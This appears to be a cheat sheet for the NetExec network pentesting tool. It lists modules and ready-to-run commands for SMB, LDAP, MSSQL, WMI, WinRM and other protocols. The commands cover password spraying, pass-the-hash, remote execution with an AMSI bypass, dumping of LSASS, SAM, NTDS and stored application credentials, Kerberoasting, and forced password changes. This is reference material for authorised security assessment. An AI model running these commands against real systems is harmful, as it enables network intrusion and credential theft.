Netexec logo
NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.

Installation for Linux

Installing NetExec with pipx

sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

Installing NetExec with pip

sudo apt install python3 python3-pip
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
python3 -m venv .
source bin/activate
pip install .
NetExec

Installation for Windows

Using Python and pipx

pip install pipx
python -m pipx ensurepath
python -m pipx install git+https://github.com/Pennyw0rth/NetExec

Both standalone binaries are available here or from the download button at the beginning of the cheat sheet.

Selecting & Using a Protocol

Available Protocols

smb
ssh
ldap
ftp
wmi
winrm
rdp
vnc
mssql
nfs

Using Protocol Options

nxc <protocol> --help                   #View a protocols options
nxc <protocol> <protocol options>       #Use protocol options

Target Formats

netexec <protocol> hacker.local                   #Hostname format
netexec <protocol> 192.168.1.0 192.168.0.2        #IP address(s)
netexec <protocol> 192.168.1.0/24                 #CIDR notation(s)
netexec <protocol> 192.168.1.0-28 10.0.0.1-67     #IP range(s)
netexec <protocol> ~/targets.txt                  #File containing a list of targets or combination of the above

Viewing Available Modules for a Protocol

nxc smb -L            #View all modules for the SMB protocol
nxc ssh -L            #View all modules for the SSH protocol
nxc ldap -L           #View all modules for the LDAP protocol
nxc ftp -L            #View all modules for the FTP protocol
nxc wmi -L            #View all modules for the WMI protocol
nxc winrm -L          #View all modules for the WINRM protocol
nxc rdp -L            #View all modules for the RDP protocol
nxc vnc -L            #View all modules for the VNC protocol
nxc mssql -L          #View all modules for the MSSQL protocol

SMB Modules

nxc smb <target(s)> -M <module name>                                  #Basic Syntax
nxc smb <target(s)> -u 'user' -p 'pass' -M lsassy                     #Example of using the lsassy module
nxc smb -M lsassy --options                                           #View module options
nxc smb <target(s)> -u 'user' -p 'pass' -M lsassy -o COMMAND='xxxx'   #Using lsassy module option. All options are specified in the form of KEY=value

###Low Privilege Modules
add-computer              #Adds or deletes a domain computer
backup_operator           #Exploit user in backup operator group to dump NTDS
coerce_plus               #Module to check if the Target is vulnerable to any coerce vulns. Set LISTENER IP for coercion.
dfscoerce                 #Module to check if the DC is vulnerable to DFSCocerc.
drop-sc                   #Drop a searchConnector-ms file on each writable share
enum_av                   #Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
enum_ca                   #Anonymously uses RPC endpoints to hunt for ADCS CAs
gpp_autologin             #Searches the domain controller for registry.xml to find autologon information and returns the username and password.
gpp_password              #Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
ioxidresolver             #This module helps you to identify hosts that have additional active interfaces
ms17-010                  #MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT
nopac                     #Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
petitpotam                #Module to check if the DC is vulnerable to PetitPotam.
printnightmare            #Check if host vulnerable to printnightmare
remove-mic                #Check if host vulnerable to CVE-2019-1040
scuffy                    #Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
shadowcoerce              #Module to check if the target is vulnerable to ShadowCoerce.
slinky                    #Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
smbghost                  #Module to check for the SMB dialect 3.1.1 and compression capability of the host, which is an indicator for the SMBGhost vulnerability (CVE-2020-0796).
spider_plus               #List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration.
spooler                   #Detect if print spooler is enabled or not
timeroast                 #Timeroasting exploits Windows NTP authentication to request password hashes of any computer or trust account
webdav                    #Checks whether the WebClient service is running on the target
zerologon                 #Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472

###High Privilege Modules (requires admin privs)
bitlocker                 #Enumerating BitLocker Status on target(s) If it is enabled or disabled
dpapi_hash                #Remotely dump Dpapi hash based on masterkeys
bh_owned                  #Set pwned computer as owned in Bloodhound
empire_exec               #Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
enum_dns                  #Uses WMI to dump DNS from an AD DNS Server
firefox                   #Dump credentials from Firefox
get_netconnections        #Uses WMI to query network connections.
handlekatz                #Get lsass dump using handlekatz64 and parse the result with pypykatz
hash_spider               #Dump lsass recursively from a given hash using BH to find local admins
iis                       #Checks for credentials in IIS Application Pool configuration files using appcmd.exe
impersonate               #List and impersonate tokens to run command as locally logged on users
install_elevated          #Checks for AlwaysInstallElevated
keepass_discover          #Search for KeePass-related files and process.
keepass_trigger           #Set up a malicious KeePass trigger to export the database in cleartext.
lsassy                    #Dump lsass and parse the result remotely with lsassy
masky                     #Remotely dump domain user credentials via an ADCS and a KDC
met_inject                #Downloads the Meterpreter stager and injects it into memory
mobaxterm                 #Remotely dump MobaXterm credentials via RemoteRegistry or NTUSER.dat export
mremoteng                 #Dump mRemoteNG Passwords in AppData and in Desktop / Documents folders (digging recursively in them) 
msol                      #Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server
nanodump                  #Get lsass dump using nanodump and parse the result with pypykatz
notepad++                 #Extracts notepad++ unsaved files.
ntdsutil                  #Dump NTDS with ntdsutil
ntlmv1                    #Detect if lmcompatibilitylevel on the target is set to lower than 3 (which means ntlmv1 is enabled)
pi                        #Run command as logged on users via Process Injection
powershell_history        #Extracts PowerShell history for all users and looks for sensitive commands.
procdump                  #Get lsass dump using procdump64 and parse the result with pypykatz
putty                     #Query the registry for users who saved ssh private keys in PuTTY. Download the private keys if found.
rdcman                    #Remotely dump Remote Desktop Connection Manager (sysinternals) credentials
rdp                       #Enables/Disables RDP
recent_files              #Extracts recently modified files
reg-query                 #Performs a registry query on the machine
reg-winlogon              #Collect autologon credential stored in the registry
remote-uac                #Enable or disable remote UAC
runasppl                  #Check if the registry value RunAsPPL is set or not
schtask_as                #Remotely execute a scheduled task as a logged on user
security-questions        #Gets security questions and answers for users on computer
shadowrdp                 #Enables or disables shadow RDP
snipped                   #Downloads screenshots taken by the (new) Snipping Tool
teams_localdb             #Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
test_connection           #Pings a host
uac                       #Checks UAC status
veeam                     #Extracts credentials from local Veeam SQL Database
vnc                       #Loot Passwords from VNC server and client configurations
wam                       #Dump access token from Token Broker Cache.
wcc                       #Check various security configuration items on Windows machines
wdigest                   #Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
web_delivery              #Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
wifi                      #Get key of all wireless interfaces
winscp                    #Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.

SMB Usage

####Scan for Vulnerabilities
nxc smb <dc_ip> -u '' -p '' -M zerologon              #Check if a DC is vulnerable to zerologon
nxc smb <dc_ip> -u '' -p '' -M petitpotam             #Check if a DC is vulnerable to petitpotam
nxc smb <dc_ip> -u 'user' -p 'pass' -M nopac          #Check if a DC is vulnerable nopac (Requires Credentials)
nxc smb <ip> -u 'user' -p 'pass' -M printnightmare    #Check for PrintNightmare
nxc smb <ip> -u 'user' -p 'pass' -M smbghost          #Check if target is vulnerable to SMBGhost
nxc smb <ip> -u '' -p '' -M ms17-010                  #Check if target is vulnerable to MS17-010
nxc smb <ip> -u 'user' -p 'pass' -M ntlm_reflection   #Check if target is vulnerable to CVE-2025-33073 NTLM Reflection

###Enumeration
nxc smb 10.1.1.0/24                                        #Returns a list of live hosts
nxc smb 10.1.1.1 -u '' -p ''                               #Enumerate Null sessions
nxc smb 10.1.1.1 -u '' -p '' --shares                      #Enumerate shares with Null sessions 
nxc smb 10.1.1.1 -u '' -p '' --pass-pol                    #Enumerate password policy with Null sessions
nxc smb 10.1.1.1 -u '' -p '' --users                       #Enumerate users with Null sessions
nxc smb 10.1.1.1 -u '' -p '' --groups                      #Enumerate groups with Null sessions
nxc smb 10.1.1.0/24 --gen-relay-list relay_list.txt        #Enumerates the network of live hosts and saves a list of only the hosts that don't require SMB signing
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --sessions         #Enumerate active sessions on the remote target
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --shares           #Enumerate shares and share permissions on all hosts
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --disks            #Enumerate disks on the remote target
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --loggedon-users   #Enumerate logged users on the remote target
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --users            #Enumerate domain users on the remote target
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --rid-brute        #Enumerate users by bruteforcing the RID on the remote target
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --groups           #Enumerate domain groups on the remote target
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --local-group      #Enumerate local groups on the remote target
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --pass-pol         #Enumerate the password policy of the domain
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M enum_av            #Enumerate antivirus installed on the host. Requires Admin privileges.
nxc smb 10.1.1.0/24  -u 'user' -p 'pass' --qwinsta         #Enumerate active Windows sessions. Requires Admin privileges (or local admin --local-auth)
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --reg-sessions     #Enumerate logged-on users with the remote registry service
nxc smb 10.1.1.1 -u 'user' -p 'pass' --interfaces          #Enumerate network interfaces
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M lockscreendoors    #Enumerate changed lockscreen executables. Requires Admin privileges (or local admin --local-auth)
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M sccm-recon6        #Enumerate primary site server and distribution point via recon6
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M keepass_discover   #Enumerate if Keepass is installed on the target system

###Password Spraying
nxc smb 10.1.1.1 -u user1 user2 user3 -p Password1                          #Spraying multiple users with one password
nxc smb 10.1.1.1 -u user1 -p password1 password2 password3                  #Spraying one user with multiple passwords
nxc smb 10.1.1.1 -u /path/to/users.txt -p Password1 --continue-on-success   #Spraying a file of users with a password/ Remove --continue-on-success if you want to stop on the first success.
nxc smb 10.1.1.1 -u Administrator -p /path/to/passwords.txt                 #Spraying one user with a file of passwords
nxc smb 10.1.1.1 -u user.txt -p password.txt                                #Sprays each user in the user file with every password in the password list

###Checking Credentials
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --local-auth                                                                 #Checking local authentication with username and password
nxc smb 10.1.1.0/24 -u '' -p '' --local-auth                                                                         #Checking if blank username and password can authenticate locally
nxc smb 10.1.1.0/24 -u 'user' -H '13b29964cc2480b4ef454c59562e675c' --local-auth                                     #Checking if a user has local authentication access using the NTHASH
nxc smb 10.1.1.0/24 -u 'user' -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth    #Checking if a user has local authentication access using LM:NT hash format

###Delegation
nxc smb 10.1.1.1 -u 'user' -p 'pass' --delegate Administrator               #If you have an object with the msDS-AllowedToActOnBehalfOfOtherIdentity attribute set to an account you control. Resource Based Constrained Delegation (RBCD).
nxc smb 10.1.1.1 -u 'MACHINE$' -H 'hash' --delegate Administrator --self    #If you have a computer account you can (nearly) always get local administrator with the s4u2self extension

###Executing Remote Commands
nxc 10.1.1.1 -u 'user' -p 'pass' -x whoami                                            #Executes the whoami command on the remote target
nxc 10.1.1.1 -u 'user' -p 'pass' -X '$PSVersionTable'                                 #Execute PowerShell commands on the remote target
nxc 10.1.1.1 -u 'user' -p 'pass' -X '$PSVersionTable'  --amsi-bypass /path/payload    #Bypass AMSI

###Spidering Shares
nxc SMB 10.1.1.1 -u 'user' -p 'pass' --spider C\$ --pattern txt             #Spider the C drive for files with txt in the file name
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M spider_plus                         #List all readable files
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True   #Dump all files from all readable shares on the target host

###Get and Put Files
nxc smb 10.1.1.1 -u 'user' -p 'pass' --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt   #Send a local file to the remote target
nxc smb 10.1.1.1 -u 'user' -p 'pass' --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt   #Get a remote file on the remote target

###Obtaining Credentials
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --sam                       #Dump SAM hashes. Requires Administrator privileges
nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --lsa                       #Dump LSA secrets. Requires Domain Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' --ntds                         #Dump the NTDS.dit from target DC. Requires Domain Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' --ntds --users                 #Dump the NTDS.dit from target DC. Requires Domain Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' --ntds --users --enabled       #Dump the NTDS.dit from target DC. Requires Domain Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' --ntds vss                     #Dump the NTDS.dit from target DC. Requires Domain Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M lsassy                      #Dump LSASS using Lsassy. Requires Administrator privileges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M nanodump                    #Dump LSASS using Nanodump. Requires Administrator privileges
nxc smb 10.1.1.1 -u 'user' -p 'pass' --dpapi                        #Dump DPAPI credentials.
nxc smb 10.1.1.1 -u 'user' -p 'pass' --dpapi cookies                #Dump DPAPI credentials. Collect all cookies in browsers
nxc smb 10.1.1.1 -u 'user' -p 'pass' --dpapi nosystem               #Dump DPAPI credentials. Won't collect system credentials
nxc smb 10.1.1.1 -u 'user' -p 'pass' --local-auth --dpapi nosystem  #Dump DPAPI credentials using local auth account. Won't collect system credentials
nxc smb 10.1.1.1 -u 'user' -p 'pass' --sccm                         #Dump the SCCM from target. Requires Domain Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' --sccm disk                    #Dump the SCCM from target. Requires Domain Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' --sccm wmi                     #Dump the SCCM from target. Requires Domain Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M wireless                    #Dump the WIFI password register in Windows. Requires Administrator privileges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M veeam                       #Dump passwords used by Veeam for backup jobs. Requires Administrator privileges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M winscp                      #Dump WinSCP Credentials stored in the registry or local files. Requires Administrator privileges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M rdcman                      #Dump Remote Desktop Connection Manager credentials. Requires Administrator privileges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M security-questions          #Dump a local user's security questions if they have them. Requires at least local Administrative privileges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M backup_operator             #Dump with BackupOperator priv. You don't need local admin privs on the remote target if you are in SeBackupPrivilege
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M wam                         #Dump access token for Azure and Microsoft 365 from Token Broker Cache. Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M wifi                        #Dump the WiFi password register in Windows
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M keepass_trigger             #Dump the master password to decrypt the database. KEEPASS_CONFIG_PATH="path_from_module_discovery"
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M putty                       #Dump PuTTY private keys. Requires Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M vnc                         #Dump VNC passwords from RealVNC or TightVNC. Requires Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M mremoteng                   #Dump mRemoteNG stored credentials. Requires Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M notepad                     #Dump unsaved Notepad documents. Requires Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M notepad++                   #Dump unsaved Notepad++ documents. Requires Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M rdcman                      #Dump Remote Desktop credential manager credentials. Requires Administrator or Local Administrator Priviledges
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M eventlog_creds              #Parses Windows logs for Event ID 4688, as well as sysmon logs for Event ID 1 to extract credentials from CMD and PowerShell commands

##Changing User Passwords
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M change-password -o NEWPASS=NewPassword                                          #Change the password of the current user to NewPassword 
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M change-password -o NEWNTHASH=31d6cfe0d16ae931b73c59d7e0c089c0                   #Change the password of the current user to new NT hash
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M change-password -o USER=TargetUser NEWPASS=NewPassword                          #Change the password of different user
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M change-password -o USER=TargetUser NEWHASH=10C035D527CA60BE3ADF51996E7CD7E1     #Change the password of a different user to new NT hash

SSH Modules

No SSH modules at this time

SSH Usage

###Password Spraying
nxc ssh 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success      #Password spray SSH

###Testing credentials
nxc ssh 10.1.1.0/24 -u 'user' -p 'pass'                                                    #Tests credentials provided
nxc ssh 10.1.1.0/24 --port 2222                                                            #Change SSH port to non-standard port

LDAP Modules

nxc ldap <target(s)> -M <module name>                                         #Basic Syntax
nxc ldap <target(s)> -u 'user' -p 'pass' -M find-computer                     #Example of using the find-computer module
nxc ldap -M find-computer --options                                           #View module options
nxc ldap <target(s)> -u 'user' -p 'pass' -M find-computer -o COMMAND='xxxxx'  #Using find-computer module option. All options are specified in the form of KEY=value

###Low Privilege Modules
adcs                      #Find PKI Enrollment Services in Active Directory and Certificate Templates Names
daclread                  #Read and backup the Discretionary Access Control List of objects. This module cannot read the DACLS recursively.
enum_trusts               #Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
find-computer             #Finds computers in the domain via the provided text
get-desc-users            #Get description of the users. May contained password
get-network               #Query all DNS records with the corresponding IP from the domain.
get-unixuserpassword      #Get unixUserPassword attribute from all users in ldap
get-userpassword          #Get userPassword attribute from all users in ldap
group-mem                 #Retrieves all the members within a Group
groupmembership           #Query the groups to which a user belongs.
laps                      #Retrieves all LAPS passwords which the account has read permissions for.
ldap-checker              #Checks whether LDAP signing and binding are required and / or enforced
maq                       #Retrieves the MachineAccountQuota domain-level attribute
obsolete                  #Extract all obsolete operating systems from LDAP
pre2k                     #Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each
pso                       #Query to get PSO from LDAP
sccm                      #Find a SCCM infrastructure in the Active Directory
subnets                   #Retrieves the different Sites and Subnets of an Active Directory
user-desc                 #Get user descriptions stored in Active Directory
whoami                    #Get details of provided user

###High Privilege Modules (requires admin privs)
None

LDAP Usage

###LDAP Authentication
nxc ldap 10.1.1.0/24 -u users.txt -p '' -k                             #Testing if an account exists without kerberos protocol
nxc ldap 10.1.1.0/24 -u 'user' -p 'pass'                               #Testing credentials
nxc ldap 10.1.1.0/24 -u 'user' -H 'A29F7623FD11550DEF0192DE9246F46B'   #Testing hash credentials

###Enumerate Users
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --users                          #Enumerate all users via LDAP
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --active-users                   #Enumerate just the active users via LDAP

##Enumerate Domain Groups
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --groups                         #Enumerate all groups in the domain
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --groups "Domain Admins"         #Enumerate all members in specific group via LDAP

##Query LDAP
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --query "(sAMAccountName=Administrator)" ""                                            #An alternative to ldapsearch
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --query "(sAMAccountName=Administrator)" "sAMAccountName objectClass pwdLastSet"       #Query raw ldap values you can use the query option together with filters

###ASREPRoast
nxc ldap 10.1.1.1 -u 'user' -p '' --asreproast output.txt            #Retrieve the Kerberos 5 AS-REP etype 23 hash of a user without Kerberos pre-authentication required
nxc ldap 10.1.1.1 -u users.txt -p '' --asreproast output.txt         #Retrieve the Kerberos 5 AS-REP etype 23 hash of a list of users without Kerberos pre-authentication required
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --asreproast output.txt        #Retrieve all the users and hashes where the Kerberos pre-authentication is not required. Requires credentials

###Find Domain SID
nxc ldap DC1.hacker.local -u 'user' -p 'pass' -k --get-sid           #Find the domain SID

###Kerberoasting
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --kerberoasting output.txt     #Retrieve the Kerberos 5 TGS-REP etype 23 hash. Requires domain credentials

##Find Misconfigured Delegation
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --find-delegation              #NetExec allows you to retrieve the list of all misconfigured delegations

###Unconstrained Delegation
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --trusted-for-delegation       #Retrieve the list of all computers and users with the flag TRUSTED_FOR_DELEGATION

###Admin Count
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --admin-count                  #adminCount Indicates that a given object has had its ACLs changed to a more secure value

###Machine Account Quota
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M maq                         #Retrieve the MachineAccountQuota domain-level attribute

###Get User Descriptions
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M get-desc-users              #Look for password inside the user's description.

###Dump gMSA
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --gmsa                         #Extract the password of a gMSA account

###Exploit ESC8 (ADCS)
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M adcs                                #List All PKI Enrollment Servers
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M adcs -o SERVER='xxxx'               #List All Certificates Inside a PKI     

###Extract Subnet
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M get-network                         #Extract subnet over an active directory environment
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M get-network -o ONLY_HOSTS=true      #Extract subnets with hosts over an active directory environment
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M get-network -o ALL=true             #Extract all subnets over an active directory environment

###Check LDAP Signing
nxc ldap -u 'user' -p 'pass' -M ldap-checker                                 #Verify if ldap requires channel binding or not

###Read DACL Rights
nxc ldap hack-dc.local -k --kdcHost hack-dc.local -M daclread -o TARGET=Administrator ACTION=read                            #Read all the ACEs of the Administrator account
nxc ldap hack-dc.local -k --kdcHost hack-dc.local -M daclread -o TARGET=Administrator ACTION=read PRINCIPAL=Hacker           #Read all the rights the Hacker user has on the Administrator
nxc ldap hack-dc.local -k --kdcHost hack-dc.local -M daclread -o TARGET_DN="DC=HACK-DC,DC=LOCAL" ACTION=read RIGHTS=DCSync   #Read all the principals that have DCSync rights on the domain
nxc ldap hack-dc.local -k --kdcHost hack-dc.local -M daclread -o TARGET=targets.txt ACTION=backup                            #Backup the DACLs of multiple targets

###Extract gMSA Secrets
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --gmsa-convert-id 313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724     #Convert gMSA id
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e2.........'    #convert gMSA LSM to NTLM

###BloodHound Ingestor
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --bloodhound --collection All       #NetExec bloodhound collector

###List DC IP and Domain Enum Trusts
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --dc-list                           #List Domain Controllers and their IP Addresses

###Enumerate SCCM
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M sccm -o REC_RESOLVE=TRUE         #Find SCCM Site-Servers, SCCM Sites, SCCM Management Points and Users, Computers or Groups related to SCCM

###Enumerate Entra ID
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M entra-id                         #Find the Entra ID synchronization server

###Dump PSO
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M pso                              #Dump PSO (Fine-Grained Password Policies (FGPPs) or Password Settings Objects (PSOs))

FTP Modules

No FTP modules at this time

FTP Usage

###Password Spraying
nxc ftp 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce                            #FTP password spraying (without bruteforce)
nxc ftp 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success      #FTP password spraying continue on success

###File Listing
nxc ftp 10.1.1.1 -u 'user' -p 'pass' --ls                              #Lists FTP files on the remote host
nxc ftp 10.1.1.1 -u 'user' -p 'pass' --ls 'directory'                  #Lists FTP Files in a specific directory on the remote host

###Download a File
nxc ftp 10.1.1.1 -u 'user' -p 'pass' --get 'file'                      #Download a specific file from the FTP server

###Upload a file
nxc ftp 10.1.1.1 -u 'user' -p 'pass' --put 'local file' 'remote file'  #Upload a file to the FTP server

WMI Modules

nxc wmi <target(s)> -M <module name>                                    #Basic Syntax
nxc wmi <target(s)> -u 'user' -p 'pass' -M spooler                      #Using the spooler module
nxc wmi -M spooler --options                                            #View module options
nxc wmi <target(s)> -u 'user' -p 'pass' -M spooler -o COMMAND='xxxxx'   #Using spooler module option. All options are specified in the form of KEY=value

###Low Privilege Modules
ioxidresolver                #This module helps you to identify hosts that have additional active interfaces
spooler                      #Detect if print spooler is enabled or not
zerologon                    #Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472

###High Privilege Modules (requires admin privs)
bitlocker                    #Enumerating BitLocker Status on target(s) If it is enabled or disabled.
enum_dns                     #Uses WMI to dump DNS from an AD DNS Server
get_netconnections           #Uses WMI to query network connections.
rdp                          #Enables/Disables RDP

WMI Usage

###Password Spraying
nxc wmi 10.1.1.0/24 -u userfile -p passwordfile                            #Password spraying
nxc wmi 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce            #Password spraying without bruteforce and continue on success

###Authentication
nxc wmi 10.1.1.1 -u 'user' -p 'pass'                                       #Testing Windows credentials with open SMB port
nxc wmi 10.1.1.1 -u 'user' -p 'pass' -d Hack.local                         #Testing Windows credentials with closed SMB port
nxc wmi 10.1.1.1 -u 'user' -p 'pass' --local-auth                          #Testing Local account credentials on remote target

###Command Execution
nxc wmi 10.1.1.1 -u 'user' -p 'pass' -u user -p 'password' -x whoami       #Execute command on remote host using WMI

MSSQL Modules

nxc mssql <target(s)> -M <module name>                                        #Basic Syntax
nxc mssql <target(s)> -u 'user' -p 'pass' -M mssql_priv                       #Example of using the mssql_priv module
nxc mssql -M mssql_priv --options                                             #View module options
nxc mssql <target(s)> -u 'user' -p 'pass' -M mssql_priv -o COMMAND='xxxxx'    #Using mssql_priv module option. All options are specified in the form of KEY=value

###Low Privilege Modules
enum_impersonate          #Enumerate users with impersonation privileges
enum_logins               #Enumerate SQL Server logins
exec_on_link              #Execute commands on a SQL Server linked server
link_enable_xp            #Enable or disable xp_cmdshell on a linked SQL server
link_xpcmd                #Run xp_cmdshell commands on a linked SQL server
mssql_coerce              #Execute arbitrary SQL commands on the target MSSQL server
mssql_priv                #Enumerate and exploit MSSQL privileges

###High Privilege Modules (requires admin privs)
empire_exec               #Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
enum_links                #Enumerate linked SQL Servers and their login configurations
met_inject                #Downloads the Meterpreter stager and injects it into memory
nanodump                  #Get lsass dump using nanodump and parse the result with pypykatz
test_connection           #Pings a host
web_delivery              #Kicks off a Metasploit payload using the exploit/multi/script/web_delivery module

MSSQL Usage

###Password Spraying
nxc mssql 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce                         #Password spraying MSSQL (without bruteforce)
nxc mssql 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success   #Password spraying MSSQL (without bruteforce) and continue on success

###Authentication
nxc mssql 10.1.1.1 -u 'user' -p 'pass'                       #Testing Windows credentials with SMB port open
nxc mssql 10.1.1.1 -u 'user' -p 'pass' -d Hack.local         #Testing Windows credentials with SMB port closed
nxc mssql 10.1.1.1 -u 'user' -p 'pass' --local-auth          #Testing local credentials
nxc mssql 10.1.1.1 -u 'user' -p 'pass' --port 1434           #Specifying a port

###MSSQL PrivEsc
nxc mssql 10.1.1.1 -u 'user' -p 'pass' -M mssql_priv         #Escalate privileges from standard user to DBA

###MSSQL Command Execution
nxc mssql 10.1.1.1 -u 'user' -p 'pass' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'         #Execute MSSQL command using NetExec

###MSSQL Upload & Download
nxc mssql 10.1.1.1 -u 'user' -p 'pass' --put-file  --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt     #Upload file
nxc mssql 10.1.1.1 -u 'user' -p 'pass' --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file                  #Download file

###Execute via xp_cmdshell
nxc mssql 10.1.1.1 -u 'user' -p 'pass' --local-auth -x whoami     #Execute Windows command via MSSQL using NetExec

###Enumerate Users by Bruteforcing RID
nxc mssql 10.1.1.0/24 -u 'user' -p 'pass' --rid-brute             #Enumerate users by bruteforcing the RID on the remote target

WinRM Modules

No WINRM modules at this time

WinRM Usage

###Password Spraying
nxc winrm 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce                          #Password spraying (without bruteforce)
nxc winrm 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success    #Password spraying (without bruteforce) and continue on success

###Authentication
nxc winrm 10.1.1.0/24 -u 'user' -p 'pass'                       #Testing credentials
nxc winrm 10.1.1.0/24 -u 'user'-p 'pass' -d Hack.local          #Testing credentials if the SMB port is closed

###Command Execution
nxc winrm 10.1.1.1 -u 'user' -p 'pass' -X whoami                #Command execution with WinRM

###Defeating LAPS
